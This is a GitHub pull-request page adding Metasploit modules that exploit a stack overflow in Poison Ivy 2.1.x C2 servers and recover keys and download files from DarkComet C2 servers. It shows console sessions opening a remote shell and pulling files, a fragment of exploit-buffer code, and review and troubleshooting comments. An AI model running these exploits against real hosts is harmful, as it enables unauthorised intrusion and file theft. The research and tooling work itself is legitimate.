New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too) #6940
Conversation
…rability in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't require knowledge of the secret key as it abuses a flaw in the cryptographic protocol. Note that this is a different vulnerability from the one affecting versions 2.2.0 and up (https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof). See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details. ## Console output Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is set to 'pivypass' and unknown to attacker). ### Version 2.1.4 ``` msf > use windows/misc/poisonivy_21x_bof msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf exploit(poisonivy_21x_bof) > check [*] 192.168.0.104:3460 The target appears to be vulnerable. msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(poisonivy_21x_bof) > exploit [*] 192.168.0.104:3460 - Performing handshake... [*] Started bind handler [*] 192.168.0.104:3460 - Sending exploit... [*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4> ```
…of DarkComet versions 3.2 and up (https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting earlier versions as well. The vulnerability can be exploited without knowledge of the secret key by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server. See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details. ## Console output Below is an example of the exploit running against versions 5.3.1 and 4.2F (DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker). ### Version 5.3.1 (unknown password) ``` msf > use auxiliary/gather/darkcomet_filedownloader msf auxiliary(darkcomet_filedownloader) > show options Module options (auxiliary/gather/darkcomet_filedownloader): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password) LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server) NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1 RHOST 0.0.0.0 yes The target address RPORT 1604 yes The target port STORE_LOOT true no Store file in loot (will simply output file to console if set to false). TARGETFILE no Target file to download (assumes password is set) msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102 LHOST => 192.168.0.102 msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - C2 server uses password [darkcometpass] [*] 192.168.0.104:1604 - Storing data to loot... [*] Auxiliary module execution completed msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false STORE_LOOT => false msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass KEY => #KCMDDC51#-890darkcometpass msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt TARGETFILE => C:\secret.txt msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - omgsecret [*] Auxiliary module execution completed ``` ### Version 4.2F (unknown password) ``` msf > use auxiliary/gather/darkcomet_filedownloader msf auxiliary(darkcomet_filedownloader) > show options Module options (auxiliary/gather/darkcomet_filedownloader): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password) LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server) NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1 RHOST 0.0.0.0 yes The target address RPORT 1604 yes The target port STORE_LOOT true no Store file in loot (will simply output file to console if set to false). TARGETFILE no Target file to download (assumes password is set) msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104 RHOST => 192.168.0.104 msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102 LHOST => 192.168.0.102 msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false NEWVERSION => false msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - Missing 1 bytes of keystream ... [*] 192.168.0.104:1604 - Initiating brute force ... [*] 192.168.0.104:1604 - C2 server uses password [darkcometpass] [*] 192.168.0.104:1604 - Storing data to loot... [*] Auxiliary module execution completed msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass KEY => #KCMDDC42F#-890darkcometpass msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false STORE_LOOT => false msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt TARGETFILE => C:\secret.txt msf auxiliary(darkcomet_filedownloader) > run [*] 192.168.0.104:1604 - omgsecret [*] Auxiliary module execution completed ```
Hi @samvartaka I don't have time to read through your blog post at the moment or audit the module immediately, but could you provide a download for the Poison Ivy binary? |
Sure, if i'm not mistaken this should be the PIVY 2.1.4 C2 server https://mega.nz/#!plgk3K6Q!_m3Tou3ILsOp4z4oamH9b-n4kCQLg5hYD-RVJaq2C14 I ran it against a Windows XP SP3 (EN) 32-bit machine but seeing as how the only gadget is located in the executable image itself i suppose that shouldn't matter much other than that PIVY apparently doesn't run on newer Windows versions than XP without some patch. |
Thanks, I'll take a look when I can. |
compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length) | ||
|
||
# Construct exploit buffer | ||
exploitBuffer = "A" * 4 # infoLen (placeholder) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I guess you could randomize these instead of ABCDs? Like:
Rex::Text.rand_text_alpha(4)
Good call @wchen-r7, I implemented your suggestions and confirmed the exploit still works fine against the 2.1.4 target. |
@samvartaka Awesome. Thanks! 👍 |
Tested and working. Nicely spotted on the actual vuln. Merging |
Samvartaka, when I load this exploit in Metasploit and run it, it gives me the following error. Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/poison_ivy_c2/chunk_214.bin What might be the issue? Can you please suggest a solution? |
Looks like you somehow didn't check out all files part of this commit, as per @wchen-r7's suggestion i stored the protocol known plaintext in a binary file named chunk_214.bin, you can find it here: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/poison_ivy_c2 Maybe retry syncing your local repo, download the file separately, or do a new checkout? |
@LoganHunt Make sure you |
This looks like Kali linux. I double-checked and the latest rolling release package has the file included. |
This module exploits a previously unknown stack buffer overflow vulnerability
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
Version 2.1.4